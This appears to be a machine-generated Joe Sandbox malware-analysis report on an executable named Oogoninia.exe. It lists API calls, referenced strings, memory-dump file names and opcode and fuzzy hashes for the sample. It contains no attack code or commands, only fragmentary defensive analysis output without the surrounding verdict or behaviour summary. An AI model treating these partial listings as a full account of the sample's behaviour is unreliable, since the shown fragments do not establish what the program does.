                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                                                                    • Opcode ID: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                                                                                                                    • Instruction ID: b201a4cd8f35b1f81cb2229438f9677fc33f9f69eb2c65fa3af33e2f38b160ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba6800c79a5e421cc747068b2104ef880767bd6b1526ac3d2082a385ebb11f2d
                                                                                                                                                                                    • Instruction Fuzzy Hash: C9015EB150424AAFDF209F61DD81A5B3A26E7C4758F104037FB04B52D1D37AAC929A6E
APIs
• CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0079FD48,Error launching installer), ref: 0040555A
• CloseHandle.KERNEL32(?), ref: 00405567
Strings
• Error launching installer, xrefs: 00405544
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CloseCreateHandleProcess
• String ID: Error launching installer
• API String ID: 3712363035-66219284
• Opcode ID: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
• Instruction ID: a44fcad5754d04da23f251c2f5d6a8b7866741138784f0b9a4d91a551686e283
• Opcode Fuzzy Hash: 9f0b0f85f0295080a22e5d155a7c66e390f8f607a8e504552004f12f3aafe87f
• Instruction Fuzzy Hash: 93E0BFF4A002097FEB10AB64ED49F7B7BADEB00644F408561FD10F6190E674A9549A79
APIs
• FreeLibrary.KERNEL32(?,766B3410,00000000,C:\Users\user\AppData\Local\Temp\,00403663,0040347D,?), ref: 004036A5
• GlobalFree.KERNEL32(008B7410), ref: 004036AC
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 0040368B
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: Free$GlobalLibrary
• String ID: C:\Users\user\AppData\Local\Temp\
• API String ID: 1100898210-3355392842
• Opcode ID: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
• Instruction ID: cb5700cda5be72b1964cac96af1ae0fa6ff587f55f39b04be5f0e3e76017d6e4
• Opcode Fuzzy Hash: f64556832675c450ee94ce825956f3fa5fe3b9abfe3e42bbbd50814105250277
• Instruction Fuzzy Hash: 78E0C2338011206BC7315F04EE04B2A777C6F48B26F020467ED447B3A087792C524BDC
APIs
• lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 0040585F
• CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402D66,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Oogoninia.exe,C:\Users\user\Desktop\Oogoninia.exe,80000000,?), ref: 0040586D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
Similarity
• API ID: CharPrevlstrlen
• String ID: C:\Users\user\Desktop
• API String ID: 2709904686-3370423016
• Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction ID: 48f05854ad55b04522f039bc0829861de91cdd92fb90a6685f37373cdb6fd5ef
• Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
• Instruction Fuzzy Hash: 05D0C773409DB05EF30362259C04B9F6A98DF17700F094466E580E6191C6789D518BAE
APIs
• GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
• GlobalFree.KERNEL32(00000000), ref: 100011B4
• GlobalFree.KERNEL32(?), ref: 100011C7
• GlobalFree.KERNEL32(?), ref: 100011F5
Memory Dump Source
• Source File: 00000000.00000002.1196297422.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.1196258164.0000000010000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196329175.0000000010003000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000000.00000002.1196354573.0000000010005000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_10000000_Oogoninia.jbxd
Similarity
• API ID: Global$Free$Alloc
• String ID:
• API String ID: 1780285237-0
• Opcode ID: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
• Instruction ID: 5d3a3765e571093bf703368c32e31ec5bfeafbef09712c331e02e9e13643e521
• Opcode Fuzzy Hash: 6ef9e3687ab983c99c874163fdcc0ee6cc2800f994ca68b8431a209e6fec97f5
• Instruction Fuzzy Hash: 6531ABB1808255AFF715CFA8DC89AEA7FE8EB052C1B164115FA45D726CDB34D910CB24
APIs
• lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405988
• lstrcmpiA.KERNEL32(00000000,00000000), ref: 004059A0
• CharNextA.USER32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059B1
• lstrlenA.KERNEL32(00000000,?,00000000,00405BD5,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004059BA
Memory Dump Source
• Source File: 00000000.00000002.1191344144.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1191289974.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191407654.0000000000407000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000409000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000077F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000784000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.0000000000787000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1191486376.000000000079F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1191486376.00000000007C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007C5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1192321403.00000000007E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                                                                    • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                    • Instruction ID: 2b31bcc4a158946671b74a97661090b9e56dbbcbef6738157e9c676b7350d0db
                                                                                                                                                                                    • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7DF0C272515518FFCB029FA5DC00D9EBBA8EF16360B2540AAF800F7310D274EE019BA9

Execution Graph

Execution Coverage: 0%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 100%
Total number of Nodes: 1
Total number of Limit Nodes: 0
execution_graph 58966 32562b90 LdrInitializeThunk

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 4 325634e0-325634ec LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: b79dd09f99b6053538c287343f65334a80b45053de71a4fcb8bc69cc125a4480
• Instruction ID: f81bc2f613d0f96207a2cc0d3c78e62e373beef1acb297f8d1781fe79bdc032e
• Opcode Fuzzy Hash: b79dd09f99b6053538c287343f65334a80b45053de71a4fcb8bc69cc125a4480
• Instruction Fuzzy Hash: FD90023164510402D600615D572874610454BD0211F61CC16A0514528DD7A58A5975A2

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1 32562bc0-32562bcc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6c81477dc930d1327a4ca66173442cb05be93d97f9840270dbbb7c941a9016c1
• Instruction ID: 80b5e0d7ccbf742be9097afc2728dccb571b79f8f329c8111888f9089766abe0
• Opcode Fuzzy Hash: 6c81477dc930d1327a4ca66173442cb05be93d97f9840270dbbb7c941a9016c1
• Instruction Fuzzy Hash: 8790023124100402D600659D661C68600454BE0311F51D816A5114515ED67589997131

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 32562b90-32562b9c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9812bf22ca9316b8e9bef2f026af94671321bf825ccb82a1ff677fe9ee6df46f
• Instruction ID: fc9ac89c1d3511ac4b303e9cddd647b932cfba3563f800ed0038a4f405b577a4
• Opcode Fuzzy Hash: 9812bf22ca9316b8e9bef2f026af94671321bf825ccb82a1ff677fe9ee6df46f
• Instruction Fuzzy Hash: CC90023124108802D610615D961878A00454BD0311F55CC16A4514618DD6A589997121

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 3 32562eb0-32562ebc LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: db145c5dd283d5769aa04524e8ee534fadc47d9763ebe68713b3f6875d9739c4
• Instruction ID: a05f3c40ba408c72e1bd6ec7cafbe9305c5c88d6911e441e62e0015a67a48cd5
• Opcode Fuzzy Hash: db145c5dd283d5769aa04524e8ee534fadc47d9763ebe68713b3f6875d9739c4
• Instruction Fuzzy Hash: 0690023124140402D600615D5A2874B00454BD0312F51C816A1254515DD63589597571

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 2 32562d10-32562d1c LdrInitializeThunk
APIs
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: e2fea17d15bbed7e134870f928a93eab8f34f9cad90dd4aa5b28294299318ec8
• Instruction ID: 0e859ce69c73657e8f203bd75fb0b6ea7ee49549f47d8914bb2f1b392e0bf37e
• Opcode Fuzzy Hash: e2fea17d15bbed7e134870f928a93eab8f34f9cad90dd4aa5b28294299318ec8
• Instruction Fuzzy Hash: 4890023124100413D611615D571874700494BD0251F91CC17A0514518DE6668A5AB121

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: $ $0
• API String ID: 3446177414-3352262554
• Opcode ID: 1f21eb81b40fa4520ca18c7ffb2caadeb1bb64c9821b796db8349604f00b567c
• Instruction ID: ffde98dea6e3e0b3bd6584656ad3bb593eeb2ee49660a0c237a37633c9c09bb4
• Opcode Fuzzy Hash: 1f21eb81b40fa4520ca18c7ffb2caadeb1bb64c9821b796db8349604f00b567c
• Instruction Fuzzy Hash: 2F3217B55083818FD350CFA8C484B6BBBE5BF88358F44492EF59987350EB74EA48CB52

Control-flow Graph (rendered graph omitted)
Strings
• 8, xrefs: 325950EE
• corrupted critical section, xrefs: 325952CD
• Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 325952D9
• Critical section address, xrefs: 32595230, 325952C7, 3259533F
• Thread is in a state in which it cannot own a critical section, xrefs: 3259534E
• Critical section debug info address, xrefs: 3259522A, 32595339
• First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 325952ED
• Critical section address., xrefs: 3259530D
• Thread identifier, xrefs: 32595345
• Invalid debug info address of this critical section, xrefs: 325952C1
• undeleted critical section in freed memory, xrefs: 32595236
• double initialized or corrupted critical section, xrefs: 32595313
• Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 32595215, 325952A1, 32595324
• Address of the debug info found in the active list., xrefs: 325952B9, 32595305
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
• API String ID: 0-2368682639
• Opcode ID: f8d9b5b740f71d82c65c02fbd86134cd85bfeadddf1c9e9f913146c57d3a5888
• Instruction ID: 2fd82046bf788cd4657e7c86a009695e751f16e61c666b72515f504ffd70d114
• Opcode Fuzzy Hash: f8d9b5b740f71d82c65c02fbd86134cd85bfeadddf1c9e9f913146c57d3a5888
• Instruction Fuzzy Hash: 7E8178B1901748BFEB10CFA4DD44FEEBBB5AB48754F20819AE904B7280C775AA45CF64
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.T2
• API String ID: 0-1220417600
• Opcode ID: 24c3aba0f8c59280fe6ec2a29a181e11c88bf17ae3a22b260669f776af0e45db
• Instruction ID: baefb13b8219ed12885c2b91b0c8d5863bafbc8848af364567600a7a3ae22efd
• Opcode Fuzzy Hash: 24c3aba0f8c59280fe6ec2a29a181e11c88bf17ae3a22b260669f776af0e45db
• Instruction Fuzzy Hash: CEB17EB69093519FEB15CE18C440B5BBBE8AF84758F41492EF984D7200DBB5EE48CB92
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
• API String ID: 0-2515994595
• Opcode ID: 1bceb1be3c66341d852a6eecae7d5d08b3a97dd4692b23d32c74300a1e1f12be
• Instruction ID: b8b1f21dd2e1614f2bc949b2f59a1b87ca4df6c42e10e87f84d35480256640cf
• Opcode Fuzzy Hash: 1bceb1be3c66341d852a6eecae7d5d08b3a97dd4692b23d32c74300a1e1f12be
• Instruction Fuzzy Hash: 5B51AFB5508321ABD316CF54DA48BABBBE8EFC4364F40491DA96483640FB75D704CB92
APIs
• RtlDebugPrintTimes.NTDLL ref: 3251651C
  • Part of subcall function 32516565: RtlDebugPrintTimes.NTDLL ref: 32516614
  • Part of subcall function 32516565: RtlDebugPrintTimes.NTDLL ref: 3251665F
Strings
• Loading the shim engine DLL failed with status 0x%08lx, xrefs: 325797B9
• apphelp.dll, xrefs: 32516446
• Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 3257977C
• minkernel\ntdll\ldrinit.c, xrefs: 325797A0, 325797C9
• Getting the shim engine exports failed with status 0x%08lx, xrefs: 32579790
• LdrpInitShimEngine, xrefs: 32579783, 32579796, 325797BF
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 3446177414-204845295
• Opcode ID: cd037a1ede439c5b71f707cd4999c46478dda268a2f9460faa8950f168faab2f
• Instruction ID: 91eed18e7af78f29698a45c2481b1f6b789c0e7d4e80fd48af4dc9c4febf70ba
• Opcode Fuzzy Hash: cd037a1ede439c5b71f707cd4999c46478dda268a2f9460faa8950f168faab2f
• Instruction Fuzzy Hash: 5B51B071689300ABE715CF24C891F9B77E4EFC4384F80491AF68597160DB30EB44CB92
Strings
• @, xrefs: 3251D09D
• @, xrefs: 3251D24F
• Control Panel\Desktop\LanguageConfiguration, xrefs: 3251D136
• Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3251D202
• \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3251D263
• h.T2, xrefs: 3257A5D2
• \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3251D06F
• Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3251D0E6
• @, xrefs: 3251D2B3
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.T2
• API String ID: 0-2166235198
• Opcode ID: c8134e33a8d918fb9d16ad9f8a71044beaeffa101b825f38ec49f7f0ddf15deb
                                                                                                                                                                                    • Instruction ID: a28665896c66ce9ce480c2dafd3eef6f9bdaa65e3563bcdf2b8a2b439e4391b9
                                                                                                                                                                                    • Opcode Fuzzy Hash: c8134e33a8d918fb9d16ad9f8a71044beaeffa101b825f38ec49f7f0ddf15deb
                                                                                                                                                                                    • Instruction Fuzzy Hash: B2A19EB14493459FE721CF14C540B9BBBE8AFC8759F40492EF99897240DBB9DA08CF92
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RtlDebugPrintTimes.NTDLL ref: 3254D879
                                                                                                                                                                                      • Part of subcall function 32524779: RtlDebugPrintTimes.NTDLL ref: 32524817
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-1975516107
                                                                                                                                                                                    • Opcode ID: 81b180d7903ff1f1dac7f686e3a44e76b0cafef72a35b080c66cbae086c5f4f6
                                                                                                                                                                                    • Instruction ID: b45ed0c3e2594a6f08bf99433bff3dfe8db04144e099b54650abfeecfd3fff4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 81b180d7903ff1f1dac7f686e3a44e76b0cafef72a35b080c66cbae086c5f4f6
                                                                                                                                                                                    • Instruction Fuzzy Hash: F651F375A06345AFEB05CF64C494B9DFBB1BF88318F51445AD801AB281DBB4BA86CB90
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
